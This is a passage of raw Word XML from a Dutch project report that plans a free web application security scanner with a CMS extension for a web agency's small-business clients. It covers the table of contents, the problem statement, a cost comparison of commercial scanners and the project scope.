                        <w:t xml:space="preserve">2.1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Stakeholders en Business doelen</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>13</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BC5D54F" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">2.2 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Doelgroep</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>17</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6F952B89" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r w:rsidRPr="00D96DB8">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>3 Onderzoek</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>23</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="48B42014" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">3.1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Inleiding</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>23</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="413F7C1A" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">3.2 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Web Security en de kwetsbaarheden</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>24</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3B88CD4F" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>3.3 Webapplicatie scanner</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>32</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A391DB4" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>3.4 Technologie</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>39</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4C35393D" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="000826D9" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>4 Concept</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>44</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30E1B180" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.1 Concept van het systeem</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>45</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D635B42" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.2 Pandora CMS Extensie</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>47</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47B0D20F" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.3 Admin Paneel</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>49</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6577768B" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.4 API</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>50</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="330B9E52" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.5 Webapplicatie scanner</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>51</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5FC571E0" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="000826D9" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>5 Eindproduct</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>66</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="34AE8028" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.1 Pandora CMS Extensie</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>67</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="257759F2" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.2 Admin Paneel</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>69</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6EC26377" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.3 Rapport</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>71</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="326EC22B" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.4 Email Service</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>73</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5E1BC1DD" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
                    <w:p w14:paraId="69E917BF" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00886DD6" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EA73F" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="34FBEE8D" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="2B7DEC60" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="2D6BD48C" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="0E200DB2" w14:textId="1CC5BB41" w:rsidR="00120248" w:rsidRPr="00CA3CAE" w:rsidRDefault="00120248" w:rsidP="00CA3CAE">
      <w:pPr>
        <w:sectPr w:rsidR="00120248" w:rsidRPr="00CA3CAE" w:rsidSect="00151A15">
          <w:headerReference w:type="default" r:id="rId17"/>
          <w:headerReference w:type="first" r:id="rId18"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E076231" w14:textId="298B3B7E" w:rsidR="00EF3E0F" w:rsidRDefault="00534DB4" w:rsidP="00EF3E0F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-1417"/>
        <w:sectPr w:rsidR="00EF3E0F" w:rsidSect="00EA42B7">
          <w:headerReference w:type="first" r:id="rId19"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="0" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252278784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="151DE44E" wp14:editId="78AA470D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>503555</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1731010</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2854960" cy="9150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E2204E" w:rsidRPr="007B37A9" w:rsidRDefault="00E2204E"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E44E" id="Text Box 565" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.65pt;margin-top:136.3pt;width:224.8pt;height:72.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="030DFEE0" w14:textId="17FE7127" w:rsidR="00E2204E" w:rsidRPr="007B37A9" w:rsidRDefault="00E2204E"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r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252344320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66BCD40A" wp14:editId="5D760F7D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>506095</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13081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0">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EA42B7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252271616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CD12B28" wp14:editId="47C62DE0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-887904</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7557135" cy="10734214"/>
                <wp:effectExtent l="0" t="0" r="37465" b="35560"/>
                <wp:wrapNone/>
                <wp:docPr id="471" name="Rectangle 471"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7557135" cy="10734214"/>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D387" id="Rectangle 471" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:-69.85pt;width:595.05pt;height:845.2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" fillcolor="#c5e1b4" strokecolor="#c5e2b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A8143" w14:textId="73A70B71"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1F710"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p>
    <w:p w14:paraId="505B3C8B" w14:textId="2BEBDE94" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 aanleiding</w:t>
      </w:r>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4859A0E0"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rsidR="00EC208C">
        <w:t>,</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6245B1E4" w:rsidR="006822D8" w:rsidRPr="00DA758E" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA758E">
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Probleemstelling</w:t>
      </w:r>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06705F8A"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w:t>
      </w:r>
      <w:r w:rsidR="00733DA6">
        <w:t>tie kunnen verkrijgen over de beveiliging status van hun website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.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0FC1A802" w:rsidR="00581B17" w:rsidRDefault="00CA3133" w:rsidP="00EE0925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business leads en gratis scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC16EC" w14:textId="2B01D28F" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">De klanten van S5 zijn </w:t>
      </w:r>
      <w:r w:rsidR="00186B88">
        <w:t>over het algemeen MKB-website</w:t>
      </w:r>
      <w:r>
        <w:t>ondernemers en doen daarom hun best om een goede klantenservice te bieden. Maar wat als een hacker er vandoor gaat met d</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t>e klantgegevens heeft de website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dan nog recht om klantenservice hoog in het vaandel te zetten? Wat kan hiertegen gedaan worden.</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t xml:space="preserve"> In het algemeen kan een website-</w:t>
      </w:r>
      <w:r>
        <w:t>eigenaar securityma</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t>atregelingen nemen om de website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> beter te bev</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t>eiligen. Hiervoor kan de website-</w:t>
      </w:r>
      <w:r>
        <w:t>eigenaar contact opnemen met een cybersecurity bedrijf dat consultancy aanbiedt</w:t>
      </w:r>
      <w:r w:rsidR="001130BA">
        <w:t>, dit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kan hoog in de kost</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t>en lopen. MKB-website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="003229E0">
        <w:t>n euro’s lopen wat menig website-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eigenaren als een overbodige kostenpost zien en ik geef ze tot een bepaalde hoogte wel gelijk maar als een hacker </w:t>
      </w:r>
      <w:r w:rsidR="003229E0">
        <w:t>jouw website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in het vizier heeft dan is de vraag nog hoe veel sc</w:t>
      </w:r>
      <w:r w:rsidR="003229E0">
        <w:t xml:space="preserve">hade er zal worden toe </w:t>
      </w:r>
      <w:r w:rsidR="009C1B75">
        <w:t>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80D85"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3"/>
        <w:gridCol w:w="2454"/>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r>
              <w:t>Acunetix</w:t>
            </w:r>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SQLi, XSS, file inclusion</w:t>
            </w:r>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r>
              <w:t>Netsparker</w:t>
            </w:r>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077D1592" w:rsidR="006822D8" w:rsidRPr="009D389F" w:rsidRDefault="005810B6" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E51AA4">
        <w:t>Tabel 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E5638E" w14:textId="04335A25" w:rsidR="006B3C0E" w:rsidRDefault="005810B6" w:rsidP="006822D8">
      <w:r>
        <w:t>In tabel</w:t>
      </w:r>
      <w:r w:rsidR="008D7A45">
        <w:t xml:space="preserve"> 1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> zie je h</w:t>
      </w:r>
      <w:r w:rsidR="0009250A">
        <w:t>oe hoog de kosten kunnen zijn,</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> open-source applicatie zijn</w:t>
      </w:r>
      <w:r w:rsidR="0096493E">
        <w:t xml:space="preserve"> daarentegen</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> gratis te gebruiken maar vergen veel techn</w:t>
      </w:r>
      <w:r w:rsidR="0011004F">
        <w:t>ische kennis. Nu zou een website-</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="006617AF">
        <w:t>S5 wilt hier wat aa</w:t>
      </w:r>
      <w:r w:rsidR="007355A2">
        <w:t xml:space="preserve">n doen door </w:t>
      </w:r>
      <w:r w:rsidR="00CA3133">
        <w:t>een webapplicatie scanner aan te bieden</w:t>
      </w:r>
      <w:r w:rsidR="004B5113">
        <w:t xml:space="preserve"> waarvan het standaardaccount </w:t>
      </w:r>
      <w:r w:rsidR="00CA3133">
        <w:t>kosteloos is voor iedereen</w:t>
      </w:r>
      <w:r w:rsidR="004B5113">
        <w:t>, deze is gelimiteerd in opties. En voor de betalende klant een premiumaccount aanschaft die over alle opties beschikt. De klanten die een website laten bouwen bij S5 kunnen gratis upgrade</w:t>
      </w:r>
      <w:r w:rsidR="00132EB0">
        <w:t>n naar een premiumaccount.</w:t>
      </w:r>
      <w:r w:rsidR="009A6538">
        <w:t xml:space="preserve"> Deze verdien model is gebaseerd op het idee om het product voor iedereen beschikbaar te maken, wat zal leiden tot meer business leads en het </w:t>
      </w:r>
      <w:r w:rsidR="00362172">
        <w:t>breidt</w:t>
      </w:r>
      <w:r w:rsidR="009A6538">
        <w:t xml:space="preserve"> de service van S5 uit richting security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A5240C" w14:textId="77777777" w:rsidR="006B3C0E" w:rsidRDefault="006B3C0E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21431F11" w14:textId="2A97BA6F" w:rsidR="00C44A00" w:rsidRDefault="00191C76" w:rsidP="006822D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253164544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="268163FA" wp14:editId="51CBE9E0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-895985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="770" name="Rectangle 77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5891E" id="Rectangle 770" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-70.5pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#c5e0b3 [1305]" strokecolor="#c5e1b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F202C5C" w14:textId="57006678" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="006D01D5">
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE00BE" w14:textId="5B10B25F" w:rsidR="00871F63" w:rsidRDefault="006822D8">
      <w:r>
        <w:t xml:space="preserve">Omdat ik mij zal </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>bezighouden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> met het ontwikkelen van een Minimal Viabl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t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="009D58A4">
        <w:t>,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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8A242" w14:textId="78AD3D27" w:rsidR="00527D27" w:rsidRDefault="00527D27" w:rsidP="006822D8"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="9915" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1887"/>
        <w:gridCol w:w="8028"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB67B2" w14:paraId="082AB34A" w14:textId="77777777" w:rsidTr="00A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14:paraId="5E9B5578" w14:textId="39389926" w:rsidR="00BB67B2" w:rsidRDefault="00BB67B2" w:rsidP="00BB67B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Project Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A55164" w14:paraId="64815B40" w14:textId="77777777" w:rsidTr="00A55164">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887" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="692CD76D" w14:textId="3437A623" w:rsidR="00BB67B2" w:rsidRDefault="008F6BE5" w:rsidP="006822D8">
            <w:r>
              <w:t>Project aanleiding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78515D9D" w14:textId="1A5EE5B6" w:rsidR="00BB67B2" w:rsidRDefault="008E6F5C" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>S5 wilt met een webapplicatie scanner kwetsbaarheden aantonen</w:t>
            </w:r>
            <w:r w:rsidR="00570510">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C1664E">
              <w:t xml:space="preserve">aan hun klanten </w:t>
            </w:r>
            <w:r w:rsidR="002C2641">
              <w:t xml:space="preserve">om hun meer inzicht te bieden op de security status van hun website. </w:t>
            </w:r>
            <w:r w:rsidR="004A6DAA">
              <w:t xml:space="preserve">Ook wilt S5 </w:t>
            </w:r>
            <w:r w:rsidR="00296935">
              <w:t>hun service aanbod uitbreiden op gebied van security</w:t>
            </w:r>
            <w:r w:rsidR="00DA590A">
              <w:t xml:space="preserve"> door het aanbieden van een gratis securityscan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A55164" w14:paraId="13095662" w14:textId="77777777" w:rsidTr="00A55164">
        <w:trPr>
          <w:trHeight w:val="1271"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="519692F8" w14:textId="3099EE29" w:rsidR="00BB67B2" w:rsidRDefault="00556574" w:rsidP="006822D8">
            <w:r>
              <w:t>Project doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18912371" w14:textId="2E37F907" w:rsidR="00BB67B2" w:rsidRDefault="00DA590A" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het ontwikkelen van een proof of concept van een webapplicatie scanner</w:t>
            </w:r>
            <w:r w:rsidR="002E4A6B">
              <w:t xml:space="preserve"> dat met een Wordpress extensie bedient kan worden.</w:t>
            </w:r>
            <w:r w:rsidR="002B773A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009B7B7F">
              <w:t>Klanten kunnen gebruiken maken van de Wordpress extensie om security scans aan te vragen</w:t>
